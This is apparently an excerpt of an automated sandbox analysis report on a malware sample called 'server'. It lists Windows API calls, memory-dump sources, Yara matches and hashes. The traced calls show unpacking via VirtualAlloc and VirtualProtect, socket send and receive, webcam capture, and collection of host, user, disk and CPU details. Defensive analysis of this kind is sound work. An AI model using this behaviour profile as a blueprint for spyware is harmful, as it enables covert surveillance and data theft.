                                                                                              • GetStartupInfoA.KERNEL32(?), ref: 00401AD8
                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00401AFB
                                                                                                • Part of subcall function 00401B54: ExitProcess.KERNEL32 ref: 00401B71
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                              • String ID:
                                                                                              • API String ID: 2057626494-0
                                                                                              • Opcode ID: dc65ff5252418ed06f7e2aeaecfc8b6d2eb23304b692f99c21b4a53cfaee9d22
                                                                                              • Instruction ID: b213e8132dc8efbe91fcc638b7e301980758df8d45bd4a2f5fe3e08e305f8fc9
                                                                                              • Opcode Fuzzy Hash: dc65ff5252418ed06f7e2aeaecfc8b6d2eb23304b692f99c21b4a53cfaee9d22
                                                                                              • Instruction Fuzzy Hash: C3219CB0A40615AEDB18EFA6DD49A6E7BB8EF04704F10403FF902B72E1DB788501CB58
                                                                                              APIs
                                                                                              • ceil.MSVCRT ref: 100035DC
                                                                                              • _ftol.MSVCRT ref: 100035E5
                                                                                              • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,?,?,?,?,?,?,?,?,?,00000118), ref: 100035F9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual_ftolceil
                                                                                              • String ID:
                                                                                              • API String ID: 3317677364-0
                                                                                              • Opcode ID: b9b9c7f959cafb60f8c472a1f707b4b1b0d8421ec6f82b85174b074a243b1b02
                                                                                              • Instruction ID: 0b1270368d2d45482b5d2b14c9809ff80a02e72387afd42c370cd588329eedd8
                                                                                              • Opcode Fuzzy Hash: b9b9c7f959cafb60f8c472a1f707b4b1b0d8421ec6f82b85174b074a243b1b02
                                                                                              • Instruction Fuzzy Hash: 8E11D2756043049BE704DF28AC8571BBBE5EBC4762F00C43EFD498B395EA76D808CA65
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _ftolceil
                                                                                              • String ID:
                                                                                              • API String ID: 2006273141-0
                                                                                              • Opcode ID: df6a29d0820029fa79311222890b0ba528136a89e509867819a9108e4dc1c471
                                                                                              • Instruction ID: f036b2167112de69efae3a2f3866b39feb2a68a965f290d79b5dff6310f46f10
                                                                                              • Opcode Fuzzy Hash: df6a29d0820029fa79311222890b0ba528136a89e509867819a9108e4dc1c471
                                                                                              • Instruction Fuzzy Hash: 7411B4717043049FE700EF24EC8562BBBD5EB84752F00C83EFD458B385EA769818CA65
                                                                                              APIs
                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000002,00000001,00000006,?,?,?,?,?,10002644,?), ref: 100126C4
                                                                                              • _beginthreadex.MSVCRT ref: 100126EC
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 100126FE
                                                                                              • CloseHandle.KERNEL32(?), ref: 10012709
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseCreateEventHandleObjectSingleWait_beginthreadex
                                                                                              • String ID:
                                                                                              • API String ID: 92035984-0
                                                                                              • Opcode ID: a791306defce20405aa908a4db8f274af4d7f10402202b8947f2bc827508db97
                                                                                              • Instruction ID: 23e376a9647dfb6a5603cf557fd056fd51601b5aa0499376741d0f3cabce9402
                                                                                              • Opcode Fuzzy Hash: a791306defce20405aa908a4db8f274af4d7f10402202b8947f2bc827508db97
                                                                                              • Instruction Fuzzy Hash: 0501DA74608351AFD300DF18CC95F2BBBE5BB88714F544A0CF598A7390D674DA048B92
                                                                                              APIs
                                                                                              • GetInputState.USER32 ref: 100027C3
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 100027CF
                                                                                              • PostThreadMessageA.USER32(00000000), ref: 100027D6
                                                                                              • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 100027E7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessageThread$CurrentInputPostState
                                                                                              • String ID:
                                                                                              • API String ID: 2517755969-0
                                                                                              • Opcode ID: 467fd943cdf485c2228c8ab07c2f3d1e6c889fb3db9b5598c51c2eda3ead2745
                                                                                              • Instruction ID: ec20eca8a2726810b7ac3bdd9eb78ebb057f1ba0a7407110d6dd7586cdd0874f
                                                                                              • Opcode Fuzzy Hash: 467fd943cdf485c2228c8ab07c2f3d1e6c889fb3db9b5598c51c2eda3ead2745
                                                                                              • Instruction Fuzzy Hash: 47D09E76680360B7F7106BA48C4EF4A3A29AB14B02F904414F705DA2E1E6F456548B66
                                                                                              APIs
                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 100FA617
                                                                                              • VirtualProtect.KERNEL32(?,?,-0000002C,-00000524,?,-0000002C,00000000,-00000524), ref: 100FA786
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Virtual$FreeProtect
                                                                                              • String ID:
                                                                                              • API String ID: 2581862158-0
                                                                                              • Opcode ID: 0d4901908797a334fb655ef77a27580c9664ec9e80afb356d6c38425ab25cfc6
                                                                                              • Instruction ID: 6f2f89bf7d1db90bc62700e0d4ef9e05fe8b12a546338cedc59c46f9f7a7bead
                                                                                              • Opcode Fuzzy Hash: 0d4901908797a334fb655ef77a27580c9664ec9e80afb356d6c38425ab25cfc6
                                                                                              • Instruction Fuzzy Hash: 356108B6A042199FDB21CA14CC80BA9B7F1EF86350F2944A8D585DB380D771ACC2EB50
                                                                                              APIs
                                                                                              • send.WS2_32(?,00000005,?,00000000), ref: 10003FE1
                                                                                              • Sleep.KERNEL32(0000000A), ref: 1000400E
                                                                                              • send.WS2_32(?,00000005,00000000,00000000), ref: 1000402B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: send$Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3329562092-0
                                                                                              • Opcode ID: 96077dc66876e708ef1fcc9b6368c56c91208f17216d08347fa5526f0ee46f43
                                                                                              • Instruction ID: 77b5075c0e0706e6fe537e8dad593779b6e714eb1a19249b102693e1965d96d3
                                                                                              • Opcode Fuzzy Hash: 96077dc66876e708ef1fcc9b6368c56c91208f17216d08347fa5526f0ee46f43
                                                                                              • Instruction Fuzzy Hash: 28110072A053129BE310CE558C84B0BB7E9EB84B91F01042DF259A7281CAB0DC498B92
                                                                                              APIs
                                                                                              • VirtualFree.KERNEL32(?,?,00004000,00000000,00025AE0,00000000,00000000,?,00401104,00000000,?,00000000,0040171B,?), ref: 0040126F
                                                                                              • VirtualProtect.KERNEL32(?,?,?,00000000,00000000,00025AE0,00000000,00000000,?,00401104,00000000,?,00000000,0040171B,?), ref: 004012B9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual$FreeProtect
                                                                                              • String ID:
                                                                                              • API String ID: 2581862158-0
                                                                                              • Opcode ID: f801a129de5809b732e664a6cc53c47325ccf0b078c9723bd4da4c6216af6513
                                                                                              • Instruction ID: cfbe6bb36115d2e176d5e1e333ca34e8b356980680857497402e3289145d6506
                                                                                              • Opcode Fuzzy Hash: f801a129de5809b732e664a6cc53c47325ccf0b078c9723bd4da4c6216af6513
                                                                                              • Instruction Fuzzy Hash: E421D871A002028BD718DF44D994E7BB3AAFB84704B4542ADE902FB3A5D734FC51C7A4
                                                                                              APIs
                                                                                              • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 10003ACE
                                                                                              • recv.WS2_32(?,?,00002000,00000000), ref: 10003B02
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: recvselect
                                                                                              • String ID:
                                                                                              • API String ID: 741273618-0
                                                                                              • Opcode ID: 19576c416ae504b1cccc257a0332ddcb8846f1a110b95e4235e961779e10f328
                                                                                              • Instruction ID: 77f38b4f01034acc4ef75d27983cb47ae4e02c498766849425d2027918183be4
                                                                                              • Opcode Fuzzy Hash: 19576c416ae504b1cccc257a0332ddcb8846f1a110b95e4235e961779e10f328
                                                                                              • Instruction Fuzzy Hash: D11103323443446BE710CA68DC95BDB73D9EF853A4F004A39BB598B1D2DB74A90983A2
                                                                                              APIs
                                                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,100FA084,EntryPoint), ref: 100FA580
                                                                                              • ExitProcess.KERNEL32(00000000), ref: 100FA8FB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocExitProcessVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 3766876677-0
                                                                                              • Opcode ID: 29cb7059c9fc364e7bf2e3c86ffc917cdf4fabc8ff533185fd67f21a229e1547
                                                                                              • Instruction ID: 4fe5e7ace49094330533e09a95d20d8f760df63a6f60646aa6e15ecdf47a5985
                                                                                              • Opcode Fuzzy Hash: 29cb7059c9fc364e7bf2e3c86ffc917cdf4fabc8ff533185fd67f21a229e1547
                                                                                              • Instruction Fuzzy Hash: E6F068B4A403199FDB628F15CD04BDA76F4EF46751F1040E5E20AAA1C1C6749DC5CF24
                                                                                              APIs
                                                                                              • HeapCreate.KERNEL32(00000000,00001000,00000000,00401A98,00000000), ref: 00402F2D
                                                                                                • Part of subcall function 00402DD4: GetVersionExA.KERNEL32 ref: 00402DF3
                                                                                              • HeapDestroy.KERNEL32 ref: 00402F6C
                                                                                                • Part of subcall function 00401B78: HeapAlloc.KERNEL32(00000000,00000140,00402F55,000003F8), ref: 00401B85
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$AllocCreateDestroyVersion
                                                                                              • String ID:
                                                                                              • API String ID: 2507506473-0
                                                                                              • Opcode ID: 1ae676ff0c69a4e6bd76d125cd19fc1d98bddf8f6eca4611174da9189c4adda8
                                                                                              • Instruction ID: 7f902ff39227f710822e6fdadf78228f4e262f85bb6e0f50fc68827d9ffdcbf0
                                                                                              • Opcode Fuzzy Hash: 1ae676ff0c69a4e6bd76d125cd19fc1d98bddf8f6eca4611174da9189c4adda8
                                                                                              • Instruction Fuzzy Hash: 98F03030684302A9DB206B315E0DB2636B49B14786F90443BF901E91E0EAF88586A619
                                                                                              APIs
                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 005C0626
                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 005C0659
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000003.1324589986.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_3_5c0000_server.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual$AllocFree
                                                                                              • String ID:
                                                                                              • API String ID: 2087232378-0
                                                                                              • Opcode ID: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
                                                                                              • Instruction ID: 14ce0655c9299a34a8be3daa5d5955485809aa52f0de16a3d79ce67e5b0e62d2
                                                                                              • Opcode Fuzzy Hash: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
                                                                                              • Instruction Fuzzy Hash: 0121D435A00219BFDB008FA4CC40FEEFFB5FB54394F608166E960A22C0E7704A519B54
                                                                                              APIs
                                                                                              • VirtualAlloc.KERNEL32(?,00000000,00001000,00000004,00000000,00025AE0,00000000,00000000,00407050,004010DB,00407050,00025AE0,00000000,?,00000000), ref: 0040119C
                                                                                              • VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,00025AE0,00000000,00000000,00407050,004010DB,00407050,00025AE0,00000000,?,00000000), ref: 004011CB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: a2a3c457274da8820965d6bbbe8d61300a5dc59c40c1fe27a0868a67a8417ca4
                                                                                              • Instruction ID: 1c7d8852802480053448be35edf0ca85dfca700aa98abf57b225bd8b4d40fa7f
                                                                                              • Opcode Fuzzy Hash: a2a3c457274da8820965d6bbbe8d61300a5dc59c40c1fe27a0868a67a8417ca4
                                                                                              • Instruction Fuzzy Hash: 15219571A442018FCB18CF14D894B2BBBE2FB88354F1585ADEA46DB390CB74DC85CBA0
                                                                                              APIs
                                                                                              • 6CC61E00.AVICAP32(00000000,?,00000064,?,00000032,?), ref: 100012BE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1222aa73b46b66728d6cd3aadffbea8403bbc66a217cf400f6dc0928efd9cc83
                                                                                              • Instruction ID: 8c5e13ae8a6d2d630b5cdf0ea91dc5de868f8d74ac694966006bdb18839bb920
                                                                                              • Opcode Fuzzy Hash: 1222aa73b46b66728d6cd3aadffbea8403bbc66a217cf400f6dc0928efd9cc83
                                                                                              • Instruction Fuzzy Hash: 29D02B3190022026F650D520AD02FDF73DC9F53B80F814138BE40D6082E9184B2E43E2
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: calloc
                                                                                              • String ID:
                                                                                              • API String ID: 2635317215-0
                                                                                              • Opcode ID: 8e9727687917e279abf897c07722a1903250bb2e9caaf9f2d8482a537b497e5c
                                                                                              • Instruction ID: 6dbe3aecfb57257a18ed92bf778f98b40f4d5830df8d968e854abdc2cc444f5c
                                                                                              • Opcode Fuzzy Hash: 8e9727687917e279abf897c07722a1903250bb2e9caaf9f2d8482a537b497e5c
                                                                                              • Instruction Fuzzy Hash: D3B012FD5042007FC908D794DC42CABB39DEFC4200F80880CBC4842201D935E804C632
                                                                                              APIs
                                                                                                • Part of subcall function 1000A950: GetVersionExA.KERNEL32 ref: 1000A964
                                                                                                • Part of subcall function 1000A950: wsprintfA.USER32 ref: 1000A97D
                                                                                              • wsprintfA.USER32 ref: 1000AA75
                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00000001,?), ref: 1000AA8E
                                                                                              • RegQueryValueExA.ADVAPI32 ref: 1000AAB2
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 1000AABD
                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,00000000), ref: 1000AB02
                                                                                              • RegQueryValueExA.ADVAPI32(?,ProcessorNameString,00000000,?,?,?), ref: 1000AB31
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 1000AB3C
                                                                                              • wsprintfA.USER32 ref: 1000AB57
                                                                                              • GetTickCount.KERNEL32 ref: 1000AB5C
                                                                                              • wsprintfA.USER32 ref: 1000ABAC
                                                                                              • GetComputerNameA.KERNEL32(?,?), ref: 1000ABC6
                                                                                              • GetUserNameA.ADVAPI32(?,00000080), ref: 1000ABD9
                                                                                              • wsprintfA.USER32 ref: 1000ABF4
                                                                                              • GetLogicalDriveStringsA.KERNEL32(00000100,?), ref: 1000AC21
                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000104,?,?,?,~MHz,00000000,00000000,?,?), ref: 1000AC7E
                                                                                              • SHGetFileInfo.SHELL32(?,00000080,?,00000160,00000410), ref: 1000AC9C
                                                                                              • lstrlen.KERNEL32(?,?,?,?,~MHz,00000000,00000000,?,?), ref: 1000ACAA
                                                                                              • lstrlen.KERNEL32(?,?,?,?,~MHz,00000000,00000000,?,?), ref: 1000ACB4
                                                                                              • GetDiskFreeSpaceExA.KERNEL32(?,?,?,00000000,?,?,?,~MHz,00000000,00000000,?,?), ref: 1000ACCD
                                                                                              • lstrlen.KERNEL32(?,?,?,?,~MHz,00000000,00000000,?,?), ref: 1000AD0A
                                                                                              • wsprintfA.USER32 ref: 1000AD2B
                                                                                              • wsprintfA.USER32 ref: 1000AD3F
                                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 1000AD90
                                                                                              • wsprintfA.USER32 ref: 1000ADB9
                                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 1000ADD8
                                                                                              • wsprintfA.USER32 ref: 1000AE01
                                                                                              • wsprintfA.USER32 ref: 1000AE79
                                                                                              • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 1000AE88
                                                                                              • wsprintfA.USER32 ref: 1000AEBE
                                                                                              • _strrev.MSVCRT ref: 1000AF02
                                                                                              • _strrev.MSVCRT ref: 1000AF1A
                                                                                              • _strrev.MSVCRT ref: 1000AF58
                                                                                              • wsprintfA.USER32 ref: 1000AFEC
                                                                                              • wsprintfA.USER32 ref: 1000AFFE
                                                                                                • Part of subcall function 10012620: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012628
                                                                                                • Part of subcall function 10012620: ??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012634
